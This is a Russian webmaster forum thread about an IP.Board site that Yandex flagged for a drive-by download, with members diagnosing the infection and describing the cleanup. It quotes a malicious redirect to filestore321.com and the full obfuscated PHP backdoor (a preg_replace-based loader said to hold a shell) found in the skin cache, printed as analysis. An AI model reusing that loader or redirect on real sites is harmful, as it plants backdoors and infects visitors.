Яндекс обнаружил вредоносный код на форуме

[Karagor]

Вопрос такой: на днях Яндекс сообщил мне, что мой сайт заражен вредоносным кодом.

 

Я полез в Яндекс.Вебмастер, который мне сообщал, что вердикт мне вынесен "Поведенческий анализ"

А именно:

 

Поведенческий анализ

 

Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.

 

Я, если честно, так и не понял что с этим делать и что и где искать. По всем остальным вердиктам хоть что-то понятно.

 

Написал вопрос в саппорт, ответ был следующим:

 

На Вашем сайте с помощью url: sport-horse.pro/index.php?ipbv=e13484a4543e54a53b72269a15c16faa&g=js периодически подгружается следующее вредоносное содержимое:

document.location='http://filestore321.com/download.php?id=6de46215' 

 

Действительно такая похожая ссылка на страницах форума встречается, но аналогичные ссылки есть в кодах страниц на других форумах.

В общем я в тупике и не понимаю в какую сторону мне рыть.

 

Делаю полный бекап форума на локалку и мыслю проверить какими-то антивирусами.

Попробовал прогнать сайт по известным мне онлайн-проверяльщикам - никто ничего не нашел.

 

Может кто-то направить добрым советом в нужную сторону? Был бы крайне признателен за помощь.

[siv1987]

В последнее время часто наблюдаю взломы подобного типа. Прямо на днях пришлось лечить один форум, а некоторые форумы тех поддержки так и сидят в серпе с этой заразой (привет товарищам с сайт нарушает авторские права).

Есть предположение что связано это с последней найденной уязвимостью (sql-injection). Предположение основано на том, что там стояла версия 3.4.5 потом делалось обновление на 3.4.7 со всеми патчами безопасности, после чего обнаружился вирус.

 

Вредоносный код сидит в /cache/skin_cache/cache_%id/skin_global.php, метод includeJS и имеет подобный вид:

 

$pk='MD5 HASH';
$rsa='o/2`B3b2go0viFoy@FoBP:UJP#`82|JGar<sj#`zK:a}bz=D2]J8r#|v2r=DyAuU2EU(oA&(K*FU2r=Qb:kCr#|AyzJAyAyge*U5P:U@P#L/a}J`ysP/yses>9f(j[}(anT(y[=`F*uUr}%_Z}&bP,%!rEU(araTb*Tn;r=`=t&"a:|tb#&`K,=Dy`JAb[<LeAuUr}%_Z}&bP,%!rEU(KRgUFR}fy,P`a}JW;r&t2*usp#P/F,LGy:`UarP$;[PTF#L$y#L}ys%$o]k8a:|vp#Us>*&"ZD|E|U|E]AFp|k&<r}|R&|P"<ZFkR`<srEU5P:;J<,%Tys=`r[|Ab*uUr}=kZ`akZ`gsEk&ZZkJE&ZakZU|EP}D(jA&t_ZfUa`gs2:JGF*FFjA&A_Z%Qyz|sr#}TF:=@K*ytb:`#a|Q8;#JW":F/b#Fga|Q8",`T2:J/r*C$;z`8aACtb#}$o]k8a:|vr*CAFrLA;]}nb:|Ar*CAFrLn;]`UF|Q8":aT;#|nb#J!r*C$2]CGF:ksyzkWr*C$F:`8or|AbkQ8":P(FkQ8b,Ut2EygP:e(",QU;GDJP[<8;#$sjA&@_E&"ZD|E|U|E]AFp|k&<rDT_Z}<srRgU;tDUF:T(yAD6yT!Bv[Y6y#|DF:`8a[=bP#=/b#W(a|J(a*FFjA&s_E&n>nFGar=G2]J8r#`UPGgUaRDU;nvsb:k8a}J(a*y5P:<Ja]}QF,U@PkJR&|P]&|PbPDTZ|k%"]kJ=R}@srEU52];@a]}QF,U@PkJ9RDJ>EZ|bP:|FKE`52];@2r=Gar<@PkJ,&|&bP#`Q;s;srEUzPnuTa]}QF,U@PkJ,&|&bP#ysrEU(Pn;@p]|Wy,&CK*&"<DJ_ED`k]A&srEU(KrW(anuU;GDJP:u(o#`zK*&UKr=`F:=/b#W(aEuUaEQsa]vs>,&(b]Z@KEgG=tfQe*U5P:DJy[|ny[&AK:}U=EuU2*Uge*QvKRWQyz`8F*una:JtF]}`bs<8b:Jt;r&(b#vJP#TDF,f0>AJz2]L`y[&/yzZGet-8;#JW>#&/F#Cgb#kU>s%@y9J(a9}5P:}JPAp(j[}`o:`Dj[}(anu@pE&}KE;zP,p(oA&PZ-Pp|-}e>tDn_,=tyz`QF*%Dor%`_EFDarTD>#(TFzkG;[P(y,<sp,=A;GDsoA&D2:`G>RCGar&D2]Csy}gs;zJTyz&"FrPgP}}J>#`8a:|v>s%@y9J(y:P#_rgUF:T(yAD6yT!Bv[Y6yz|s2r=DysUW_zJ}F,%}F*D6yT!Bv[Y6;]CD2Z=T;#T`E:kG2,Dz;]}Qj#yJ2ses_tQ/y#=A2r%D_np5"rDYY.';
$pka='0}9J8<ie?.4m-/Vulk&bI7W+^E>X,GOM5L$`"|vnBTzc%*oFRA2s]@6tqaPUw3[dZ;~DQyfCp{=#jHgS(1rh:YN_)!Kx';
$pkb='61D9uQ_M&;`!Evqg,FRb$<t:/SL?Hz^*7x8lfV4i(hm}BCedTyanWo.j{ZJk#@3~UY"0wcA5I+N2O>s]p%X|G)-P=rK[';
$f='%t%'.substr($rsa,566,1);
$klf=preg_replace($f,strtr($rsa,$pka,$pkb),'html');

Сигнатура обфусцированного кода может отличатся в разных случаях. Закадирован в нем шелл и редирект на filestore321.com/download.php?id={$m}.

Деятельность вируса палится по наличию куке lang_id eng после ридеректа на вредоносный сайт - заплатка для предотвращения повторного редиректа.

Проверить на взлом этим вирусом можно перейдя на форум из поисковых систем. Также можно проверить по адресу forum.ru/index.php?ipbv=hash&g=js, если откроется пустая страница значит форум заражен (при первом заходе на форум нужно два раза запросить этот адрес).

 

Основная суть лечения заключается в:

• Проверка шаблона Глобальные -> includeJS в АЦ. Обновления кеша стилей для удаления вредасного кода из кеша.
  
• Обновления форума до актуальной версии или обязательная установка всех патчей безопасности после выхода вашей версии
  
• Смена паролей для:
  - всех (!) пользователей имеющих доступ в АЦ
  - базе данных
  - фтп
  
• Добавления форума в Яндекс.Вебмастер'е с отправкой запроса на перепроверку в разделе Безопасность (это ускорит повторную проверку форума). Проверка, как правило, длится несколько дней.
  

Но это не дает гарантий что злоумышленик не оставил шеллы где-то еще в других файлах. Для полного лечения нужно просканировать весь форум специальным сканером шеллов, либо искать вручную вредоносные сигнатуры и функции которые чаще всего используются для составления закладок - eval, assert, base64_decode, preg_replace, etc и анализировать их на предмет вредоносности. Популярным для этих целей является скрипт ai-bolit - www.revisium.com/ai/. Хотя работает он жутко медленно и сканрует все подряд, ранние его версии мне больше нравились.

[Атаман]

Дополню, яндекс сейчас очень усердно помечает форумы, как зараженные и тд. (А всё дело, во внешних ссылках в постах, которые ведут на хостинги картинок и тд). Обычно, при посещении конкретной ветки он орал, страница заражена, а сейчас весь сайт.

[Karagor]

Ох, спасибо.

Видимо предстоит нешуточный геморрой (((

 

Буду пробовать.

[Karagor]

Странно, патч не грузится почему-то, хоть я и залогинен под логином с которого покупал форум. Может они еще что-то нашли и делают новый?

[newbie]

Странно, патч не грузится почему-то, хоть я и залогинен под логином с которого покупал форум. Может они еще что-то нашли и делают новый?

http://ipbskins.ru/forum/topic10798.html/page__view__findpost__p__88545

Ниже еще найдете ссылку на последний патч

[Атаман]

http://forums.ibresource.ru/topic/65897-ipboard-33x-34x-security-update/

[Атаман]

Дополню, яндекс сейчас очень усердно помечает форумы, как зараженные и тд. (А всё дело, во внешних ссылках в постах, которые ведут на хостинги картинок и тд). Обычно, при посещении конкретной ветки он орал, страница заражена, а сейчас весь сайт.

 

И все зараженные страницы видно в веб мастере.

[siv1987]

А всё дело, во внешних ссылках в постах, которые ведут на хостинги картинок и тд

У яндекса конечно бывают глюки, особенно на всякие скрипты контекстной рекламы (учитывая последний фейл google adwords'а откуда долгое время лился трафик на вирусные сайта) и картинок с зараженных сайтов, но в свете последней волны взломов я бы всетаки тщательно проверил форум на взлом.

[Karagor]

Отчитываюсь:

 

1. Патч поставил

2. Обновил кеш стилей

3. Поменял все пароли

 

На данный момент по запросу sport-horse.pro/index.php?ipbv=hash&g=js вместо пустой страницы выдается страница сайта.

Послал в яндекс запрос на перепроверку сайта.

 

Жду )

[Karagor]

Да, попытался запустить скрипт айболит, но что-то он вылетает в 504 Gateway Time-out.

Почитал у них на сайте ФАК, пошел запускать через SSH

 

Запустил, ждем-с 55к файлов...

[siv1987]

По поводу патчей. Желательно ставить не один конкретный, а все имеющиеся. В каждом из них закрыта какая-то уязвимость, какие-то более критические, какие-то нет. А лучше всего обновится до последней версии. Была бы английская версия, можно было скачать пропатченный дистрибутив из клиентцентра.

[siv1987]

Да, попытался запустить скрипт айболит, но что-то он вылетает в 504 Gateway Time-out.

Из браузера даже не стоит пытаться. Только из ssh. Скрипт нужно сконфигурировать чтобы сканировал только php файлы.

[Karagor]

На данный момент кончилась лицензия, а по новому курсу платить за продление пока не решаюсь.

 

А патчи не накопительные разве?

Но я вообще-то ставил все, кроме последнего.

[siv1987]

А патчи не накопительные разве?

Накопительные - это версии. А патчи устраняют найденную в определенный момент времени конкретную проблему.